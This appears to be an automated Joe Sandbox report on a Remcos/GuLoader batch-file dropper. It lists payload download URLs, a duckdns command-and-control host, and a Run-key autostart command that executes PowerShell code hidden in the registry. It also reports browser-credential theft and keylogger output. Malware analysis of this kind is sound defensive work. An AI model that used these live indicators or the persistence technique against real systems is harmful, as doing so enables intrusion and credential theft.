Found suspicious powershell code related to unpacking or dynamic code loading 21->64 32 conhost.exe 21->32         started        file8 signatures9 process10 signatures11 86 Tries to harvest and steal browser information (history, passwords, etc) 25->86 36 conhost.exe 30->36         started        38 reg.exe 1 1 30->38         started        process12

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                SKM_0001810-01-2024-GL-3762.bat5%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                http://crl.m0%URL Reputationsafe
                https://aka.ms/pscore6lB0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://login.yahoo.com/config/login0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                artieri.ro
                89.44.138.129
                truefalse
                  unknown
                  geoplugin.net
                  178.237.33.50
                  truefalse
                    unknown
                    renajazinw.duckdns.org
                    193.187.91.216
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://artieri.ro/l/Squirtish.tocfalse
                        unknown
                        https://artieri.ro/l/Squirtish.tocfalse
                          unknown
                          renajazinw.duckdns.orgtrue
                            unknown
                            https://artieri.ro/l/MhRliPwcjA146.binfalse
                              unknown
                              http://geoplugin.net/json.gpfalse
                              • URL Reputation: safe
                              unknown
                              http://artieri.ro/l/MhRliPwcjA146.binfalse
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1842948147.00000299B0691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2020592068.0000000005509000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://artieri.ro/l/Squirtish.tocPpowershell.exe, 00000002.00000002.1819894131.00000299A084D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2003377211.00000000045F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2031771980.0000000007027000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2003377211.00000000045F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2031771980.0000000007027000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://microsoft.comsiexec.exe, 00000009.00000003.2172179148.00000000095BF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2172331289.00000000095F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://go.micropowershell.exe, 00000002.00000002.1819894131.00000299A11E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://contoso.com/Licensepowershell.exe, 00000004.00000002.2020592068.0000000005509000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://contoso.com/Iconpowershell.exe, 00000004.00000002.2020592068.0000000005509000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://artieri.ro/l/MhRliPwcjA146.bindmsiexec.exe, 00000009.00000003.2213273303.00000000095A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://artieri.ropowershell.exe, 00000002.00000002.1819894131.00000299A23A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1819894131.00000299A0AA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2003377211.00000000045F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2031771980.0000000007027000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://crl.mmsiexec.exe, 00000009.00000003.2172179148.00000000095BF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2172331289.00000000095F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://artieri.ro/l/Squirtish.tocXRpowershell.exe, 00000004.00000002.2003377211.00000000045F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.2003377211.00000000044A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.microsoft.&omsiexec.exe, 00000009.00000003.2172179148.00000000095BF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2172331289.00000000095F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://artieri.ropowershell.exe, 00000002.00000002.1819894131.00000299A084D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1819894131.00000299A23BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1819894131.00000299A2057000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1819894131.00000299A23A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://contoso.com/powershell.exe, 00000004.00000002.2020592068.0000000005509000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1842948147.00000299B0691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2020592068.0000000005509000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                                    unknown
                                                    https://login.yahoo.com/config/loginmsiexec.exefalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.1819894131.00000299A0621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.nirsoft.net/msiexec.exefalse
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1819894131.00000299A0621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2003377211.00000000044A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      89.44.138.129
                                                      artieri.roRomania
                                                      5588GTSCEGTSCentralEuropeAntelGermanyCZfalse
                                                      178.237.33.50
                                                      geoplugin.netNetherlands
                                                      8455ATOM86-ASATOM86NLfalse
                                                      193.187.91.216
                                                      renajazinw.duckdns.orgSweden
                                                      197595OBE-EUROPEObenetworkEuropeSEtrue
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1536952
                                                      Start date and time:2024-10-18 12:38:09 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 8m 41s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:19
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:SKM_0001810-01-2024-GL-3762.bat
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winBAT@22/13@3/3
                                                      EGA Information:
                                                      • Successful, ratio: 60%
                                                      HCA Information:
                                                      • Successful, ratio: 96%
                                                      • Number of executed functions: 162
                                                      • Number of non-executed functions: 301
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .bat
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target powershell.exe, PID 1188 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 3488 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: SKM_0001810-01-2024-GL-3762.bat
                                                      TimeTypeDescription
                                                      06:39:05API Interceptor87x Sleep call for process: powershell.exe modified
                                                      06:39:50API Interceptor134045x Sleep call for process: msiexec.exe modified
                                                      11:39:47AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)
                                                      11:39:56AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      89.44.138.129SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • artieri.ro/g/MihrGCaVzvslPdUujzk140.bin
                                                      178.237.33.50SecuriteInfo.com.Variant.Ulise.323893.7366.1016.exeGet hashmaliciousUnknownBrowse
                                                      • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                      Ibnh3BCQSQ.exeGet hashmaliciousUnknownBrowse
                                                      • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                      nicetokissthebestthingsiwantotgetmebackwith.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • geoplugin.net/json.gp
                                                      Priority_Quote_Request_Items_List.exeGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • geoplugin.net/json.gp
                                                      SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      Proof_of_Payment 08637.exeGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      New Order.exeGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      PO OCTOBER 2024 _ PDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • geoplugin.net/json.gp
                                                      193.187.91.216SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                        SecuriteInfo.com.Win32.PWSX-gen.24212.14364.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          artieri.roSKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 89.44.138.129
                                                          renajazinw.duckdns.orgSKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 193.187.91.216
                                                          geoplugin.netnicetokissthebestthingsiwantotgetmebackwith.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                          • 178.237.33.50
                                                          rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 178.237.33.50
                                                          Priority_Quote_Request_Items_List.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 178.237.33.50
                                                          SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          Proof_of_Payment 08637.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          New Order.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          PO OCTOBER 2024 _ PDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 178.237.33.50
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          OBE-EUROPEObenetworkEuropeSESKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 193.187.91.216
                                                          XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                          • 194.32.149.14
                                                          bot_library.exeGet hashmaliciousUnknownBrowse
                                                          • 193.182.111.131
                                                          z2PO20240815.pdf.lnkGet hashmaliciousXWormBrowse
                                                          • 193.187.91.208
                                                          SecuriteInfo.com.Win32.PWSX-gen.24212.14364.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                          • 193.187.91.216
                                                          https://www.canva.com/design/DAGLxvJi_b4/I2I9hVBC94poYJRY8neUTg/view?utm_content=DAGLxvJi_b4&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                          • 194.32.144.119
                                                          REV-New Order 20240717^^^^^^^^^^^^^^^^^^.pif.exeGet hashmaliciousPureLog StealerBrowse
                                                          • 193.187.91.208
                                                          REV-New Order 20240717.pif.exeGet hashmaliciousRemcosBrowse
                                                          • 193.187.91.124
                                                          SecuriteInfo.com.AutoIt.Injector-JY.190.10007.exeGet hashmaliciousUnknownBrowse
                                                          • 193.182.111.41
                                                          906o5yr1NE.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                          • 45.15.16.116
                                                          ATOM86-ASATOM86NLSecuriteInfo.com.Variant.Ulise.323893.7366.1016.exeGet hashmaliciousUnknownBrowse
                                                          • 178.237.33.50
                                                          Ibnh3BCQSQ.exeGet hashmaliciousUnknownBrowse
                                                          • 178.237.33.50
                                                          nicetokissthebestthingsiwantotgetmebackwith.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                          • 178.237.33.50
                                                          rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 178.237.33.50
                                                          Priority_Quote_Request_Items_List.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 178.237.33.50
                                                          SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          Proof_of_Payment 08637.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          New Order.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          PO OCTOBER 2024 _ PDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 178.237.33.50
                                                          GTSCEGTSCentralEuropeAntelGermanyCZarm7.elfGet hashmaliciousUnknownBrowse
                                                          • 94.42.225.19
                                                          spc.elfGet hashmaliciousMiraiBrowse
                                                          • 212.38.198.226
                                                          arm6.elfGet hashmaliciousUnknownBrowse
                                                          • 91.120.127.45
                                                          SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 89.44.138.129
                                                          spc.elfGet hashmaliciousMiraiBrowse
                                                          • 94.42.225.51
                                                          powerpc.elfGet hashmaliciousMiraiBrowse
                                                          • 178.183.111.126
                                                          db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                          • 91.139.6.161
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 89.40.18.190
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 178.183.111.121
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 94.42.225.25
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0eZ2tJveQl3B.exeGet hashmaliciousUnknownBrowse
                                                          • 89.44.138.129
                                                          picturewithgirlsloveoneverydayhii.htaGet hashmaliciousCobalt StrikeBrowse
                                                          • 89.44.138.129
                                                          VXCBND3435.exeGet hashmaliciousLokibotBrowse
                                                          • 89.44.138.129
                                                          v8AZ8ANS6a.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 89.44.138.129
                                                          DHL AWB - COMMERCIAL INVOICE AND BL.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 89.44.138.129
                                                          Shipping Documents.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 89.44.138.129
                                                          PURCHASE SPCIFICIATIONS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • 89.44.138.129
                                                          Justificante de pago.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 89.44.138.129
                                                          RFQ-KTE-07102024.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 89.44.138.129
                                                          Request for Q uotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 89.44.138.129
                                                          37f463bf4616ecd445d4a1937da06e19Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                                          • 89.44.138.129
                                                          Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                                          • 89.44.138.129
                                                          Justificante de pago.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 89.44.138.129
                                                          BON 521264.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 89.44.138.129
                                                          mbkM35oaF7.msiGet hashmaliciousUnknownBrowse
                                                          • 89.44.138.129
                                                          rSvigt.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 89.44.138.129
                                                          Simple.exeGet hashmaliciousUnknownBrowse
                                                          • 89.44.138.129
                                                          Simple.exeGet hashmaliciousUnknownBrowse
                                                          • 89.44.138.129
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 89.44.138.129
                                                          file.exeGet hashmaliciousUnknownBrowse
                                                          • 89.44.138.129
                                                          No context
                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):144
                                                          Entropy (8bit):3.373583598653465
                                                          Encrypted:false
                                                          SSDEEP:3:rhlKlM+UldlFRRfqlFi5JWRal2Jl+7R0DAlBG45klovDl6v:6ly6lc5YcIeeDAlOWAv
                                                          MD5:216E6B51BA0FC10EAE753CC90B58BD42
                                                          SHA1:252B7C6E662F1BFBD579B49368BB729FDACC44BF
                                                          SHA-256:77BF6EBCDFB1534DD9A8ADB18358071E3746BA61435F04E0A45167E266EFC0C5
                                                          SHA-512:7FE1E6B68E1CAE5D1FD4DBF6BA40473F38B35E2E3F2AD27C5998C21B094CC4D13195B045113A6847E5F1DC52B993882E6B08E5D6537D76EE6C80CC83B8D87AE9
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                          Preview:....[.2.0.2.4./.1.0./.1.8. .0.6.:.4.0.:.0.7. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):956
                                                          Entropy (8bit):5.016616617248742
                                                          Encrypted:false
                                                          SSDEEP:12:tkTLJend6UGkMyGWKyGXPVGArwY3AoQasHuGvB+Arpv/mOAaNO+ao9W7iN5zzkwV:qpSdVauKyGX85MEBZvXhNlT3/7l1DYro
                                                          MD5:9220BE8AB34657C7535C5A2582857DC7
                                                          SHA1:2BE54CB6D990A4F9C6D6AE30A618EAB88F181634
                                                          SHA-256:0E97AB60A1FF8EECB241E186B7C690D4900E2922FBAE2125DA469EADEAAFD1F0
                                                          SHA-512:23D31D1370AE2F5663F5957BA204BC16EA15E0B7F37669D55E3BB14B594FAAAA782E52926CED9E5D87E915910DF48945D57B7CC04CF44C3C7CE095EFB4D3BE01
                                                          Malicious:false
                                                          Preview:{. "geoplugin_request":"155.94.241.186",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Dallas",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"623",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"32.8137",. "geoplugin_longitude":"-96.8704",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):8003
                                                          Entropy (8bit):4.840877972214509
                                                          Encrypted:false
                                                          SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                          MD5:106D01F562D751E62B702803895E93E0
                                                          SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                          SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                          SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                          Malicious:false
                                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1940658735648508
                                                          Encrypted:false
                                                          SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                          MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                          SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                          SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                          SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                          Malicious:false
                                                          Preview:@...e................................................@..........
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x637bc9fe, page size 32768, DirtyShutdown, Windows version 10.0
                                                          Category:dropped
                                                          Size (bytes):20447232
                                                          Entropy (8bit):1.2844967352843446
                                                          Encrypted:false
                                                          SSDEEP:12288:c5r2P2g70KOOfvUDb2n+AG5cpFFOH9W/2F:J2pRDE+
                                                          MD5:9A07859CDFAD55B2EAD122402A93A5DD
                                                          SHA1:E814ABEBF77387F785008F5523938E9DF6189339
                                                          SHA-256:4449A0F1368FA6B67C9350558BA1636445A8A9B7F7D43E49498D8014F88D5A49
                                                          SHA-512:AE0DAFE0197BEB4FB79F39F3A947142BFB256B08497FFD3FBE6823F5EC1C5061EA4DA660D0CE567DBF769F29B5EF9AC8F9107A5153BDA6CC5A67F74E5CE2B51D
                                                          Malicious:false
                                                          Preview:c{..... ........=......J}...0...{........................"..........{.......{..h.$..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;..................................y.......{..........................{...........................#......h.$.....................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):2
                                                          Entropy (8bit):1.0
                                                          Encrypted:false
                                                          SSDEEP:3:Qn:Qn
                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
